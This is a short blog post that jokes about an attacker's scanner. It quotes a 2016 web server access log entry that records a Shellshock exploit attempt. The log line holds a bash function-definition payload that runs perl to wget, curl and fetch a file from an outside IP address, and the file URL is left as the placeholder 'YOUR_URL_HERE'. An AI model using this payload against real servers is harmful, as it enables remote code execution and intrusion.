You know you're skilled as a hacker when you're so fast, you don't even need to configure your scanning scripts:
106.51.29.122 - - [01/Aug/2016:13:49:38 -0400] ***.******.*** "GET HTTP/1.1 HTTP/1.1" 400 340 "-" "()
{ :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://185.125.4.222/YOUR_URL_HERE ;
curl -O http://185.125.4.222/YOUR_URL_HERE ; fetch http://185.125.4.222/YOUR_URL_HERE\");'"
They're trying to use a the Shellshock vulnerability I think.
Leave a comment